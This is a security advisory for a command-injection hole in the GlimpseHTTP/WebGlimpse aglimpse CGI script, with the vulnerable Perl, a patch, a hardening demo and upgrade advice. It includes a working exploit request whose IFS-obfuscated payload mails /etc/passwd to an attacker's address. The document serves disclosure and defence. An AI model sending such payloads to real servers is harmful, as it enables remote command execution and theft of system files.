COMMAND

    /cgi-bin/aglimpse

SYSTEMS AFFECTED

    GlimpseHTTP 2.0 and WebGlimpse versions prior to 1.5

PROBLEM

    Another HTTP vulnerability, this time in a small utility: GlimpseHTTP,
    a CGI interface to the Glimpse search tool, written in Perl.  The hole
    is a small one, but it allows execution of arbitrary commands on  the
    remote system (as the user the HTTP server runs as).

    Quote from the source (latest version at time of exploit):

    --begin--

    $path_info = $ENV{'PATH_INFO'};
    $_ = $path_info;

    # /<length>/$indexdir/$path is the format of the PATH_INFO

    # might as well start the message now
    print "Content-type: text/html\n\n";
    print "<HTML>\n";
    print "<HEAD>\n";

    if ( m|^/([0-9]*)(.*)$| ) {
            $length = $1;
            $path = $2;
            $path =~ s|"||g;
    } else {
            &err_badargs;
    }

    $indexdir = substr($path,0,$length);
    $relpath = substr($path,$length,length($path));

    # print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

    open(CONF,"$indexdir/archive.cfg") || &err_conf;

    --end--

    As you can see, it splits PATH_INFO into two fields, $length and
    $path, takes the first $length characters of $path as $indexdir, and
    the last line opens "$indexdir/archive.cfg".  Both fields come
    straight from the request, so the client controls $indexdir
    completely; the only filtering is the removal of double quotes.

    Now for the evil part.  Perl's two-argument open() treats a file name
    that begins with '|' as a command: the shell runs whatever follows
    the pipe, and whatever the script writes to the CONF handle becomes
    that command's standard input.  So an $indexdir that begins with '|'
    executes a command of the attacker's choosing.

    The inconvenient part is that most HTTP servers will not accept TABS
    or SPACES in PATH_INFO (Netscape's servers are the exception; CERN
    httpd and Apache do refuse them), and there are not many "one word"
    commands that can be made to do something evil.

    Here is where the famous IFS variable comes in handy.  If $indexdir
    is set to something like:

    "|IFS=5;CMD=5mail5your_address\@your_computer.com\</etc/passwd;eval$CMD;echo"

    the shell first sets its field separator to "5", stores the  command
    in CMD as a single word, and then, when eval expands $CMD, splits it
    on "5" into separate words, so what actually runs is

    mail your_address@your_computer.com </etc/passwd

    which mails your /etc/passwd to the address given.  The final "echo"
    is there only so that whatever the script appends (the "/archive.cfg")
    is tacked onto a harmless word rather than onto the mail command.  Of
    course any other separator can be used instead of "5".

    Now for the exploit:

        telnet target.machine.com 80

        GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5your_address\@your_computer.com\</etc/passwd;eval$CMD;echo HTTP/1.0

    (the request line goes on one line and is followed by an empty line
    to end the request).  The "80" is the $length field: it must be  at
    least as long as the payload, so that all of it ends up in $indexdir.

    Note that the cgi-bin directory could be located somewhere else (for
    example in /scripts, /cgi, or a directory reserved for glimpse).  Also
    note that the backslashes in the command are required: they keep  the
    shell from interpreting the "<" (and the "@") while it assigns CMD, so
    the redirection only takes effect when eval re-parses $CMD.  Credit
    goes to Razvan Dragomirescu.

SOLUTION

    Insert this code directly above the open() line quoted above, so  the
    check runs on $indexdir before the file name is built.  Credit  goes
    to Brian L. Gentry.

    if($indexdir =~ tr/;<>*|`&$!#()[]{}:'"//) {
            print "<H1>Evil characters found! Exiting.</H1>";
            exit(1);
    }

    open(CONF,"$indexdir/archive.cfg") || &err_conf;

    The tr/// counts occurrences of the listed characters and the script
    exits if there are any, which stops the pipe trick.  It is a blacklist
    of shell metacharacters only: $indexdir is otherwise still whatever
    path the client names, so anything else that should be restricted
    (for example confining it below the directory the indexes live in)
    needs a separate check.
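    As an added example (not code from GlimpseHTTP or WebGlimpse), the
    following Perl reproduces the PATH_INFO split from the source quoted
    above, reports what Perl's two-argument open() would do with the
    resulting name, and puts a whitelist check plus three-argument open()
    beside it as the alternative to the character blacklist.  The index
    root /var/glimpse/indexes and the two PATH_INFO strings are made up
    for the demonstration; nothing is executed and no mail is sent.

```perl
#!/usr/bin/perl
# Added example, not part of GlimpseHTTP or WebGlimpse.  The index root
# and the PATH_INFO strings at the bottom are made up for the demo.
use strict;
use warnings;

my $INDEX_ROOT = '/var/glimpse/indexes';   # assumed site-specific location

# Same split as the vulnerable script: /<length><path>, the first <length>
# characters of <path> become $indexdir.  Both values come from the client.
sub split_path_info {
    my ($path_info) = @_;
    return unless $path_info =~ m|^/([0-9]*)(.*)$|;
    my ($length, $path) = ($1 || 0, $2);
    $path =~ s|"||g;                      # the script's only filtering
    my $indexdir = substr($path, 0, $length);
    # The script calls substr($path,$length,...) unguarded; the guard here
    # only avoids a warning when $length exceeds the length of the path.
    my $relpath = $length < length($path) ? substr($path, $length) : '';
    return ($indexdir, $relpath);
}

# What two-argument open() infers from a name such as "$indexdir/archive.cfg".
# Leading whitespace is skipped; a leading '|' means "run the rest as a
# shell command and write to its stdin".  Nothing is opened or run here.
sub two_arg_open_mode {
    my ($spec) = @_;
    $spec =~ s/^\s+//;
    return "run a shell command, write to its stdin" if $spec =~ /^\|/;
    return "open for append"                         if $spec =~ /^\+?>>/;
    return "open for writing (truncates)"            if $spec =~ /^\+?>/;
    return "open read-write"                         if $spec =~ /^\+</;
    return "open for reading";
}

# Whitelist check: returns "" if $indexdir is acceptable, else the reason.
# Anything not explicitly allowed is refused, and the directory is also
# confined below $INDEX_ROOT.
sub indexdir_problem {
    my ($indexdir) = @_;
    return "characters outside [A-Za-z0-9_./-]"
        unless $indexdir =~ m{^[A-Za-z0-9_./-]+$};
    return "contains a .. component"
        if $indexdir =~ m{(^|/)\.\.(/|$)};
    return "not below $INDEX_ROOT"
        unless $indexdir =~ m{^\Q$INDEX_ROOT\E/};
    return "";
}

# Hardened replacement for open(CONF,"$indexdir/archive.cfg").  With the
# explicit '<' mode the third argument is a file name and nothing else,
# whatever characters it contains.
sub open_conf_safely {
    my ($indexdir) = @_;
    my $problem = indexdir_problem($indexdir);
    die "refusing index directory: $problem\n" if $problem;
    open(my $conf, '<', "$indexdir/archive.cfg")
        or die "cannot open $indexdir/archive.cfg: $!\n";
    return $conf;
}

# Constructed requests: a legitimate one, and one shaped like the
# advisory's payload (single quotes keep the backslashes and '$' literal).
my @cases = (
    '/25/var/glimpse/indexes/docs/index.html',
    '/80|IFS=5;CMD=5mail5you\@example.com\</etc/passwd;eval$CMD;echo',
);

for my $pi (@cases) {
    my ($indexdir, $relpath) = split_path_info($pi);
    next unless defined $indexdir;
    print "PATH_INFO: $pi\n";
    print "  indexdir=$indexdir  relpath=$relpath\n";
    print "  two-arg open() would: ", two_arg_open_mode("$indexdir/archive.cfg"), "\n";
    my $problem = indexdir_problem($indexdir);
    print "  whitelist check: ", ($problem ? "rejected ($problem)" : "accepted"), "\n";
    # The hardened open succeeds only where the index really exists; on a
    # machine without /var/glimpse/indexes it fails with "No such file".
    my $fh = eval { open_conf_safely($indexdir) };
    print "  hardened open(): ", ($fh ? "ok\n" : "failed: $@");
    close $fh if $fh;
}
```

    For the first request the whitelist accepts "/var/glimpse/indexes/docs"
    and the two-argument open() would simply read a file; for the second,
    two_arg_open_mode() reports that the original line would have handed
    the string to the shell, while the whitelist rejects it on the first
    disallowed character.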

    The authors have decided to stop supporting GlimpseHTTP, and instead
    have released a new version (1.5) of WebGlimpse, which has most of the
    features of GlimpseHTTP and many more.  Users of any version of
    GlimpseHTTP are encouraged to upgrade to the new WebGlimpse.  Users of
    earlier versions of WebGlimpse are also encouraged to upgrade, as
    version 1.5 is more robust and more secure.  WebGlimpse can be found
    at:

        http://glimpse.cs.arizona.edu/webglimpse/

    For sites that cannot immediately install the current version of
    WebGlimpse, it is recommended that you disable the version of
    GlimpseHTTP or WebGlimpse you are using and use another script to
    interface to Glimpse, or apply the patch above.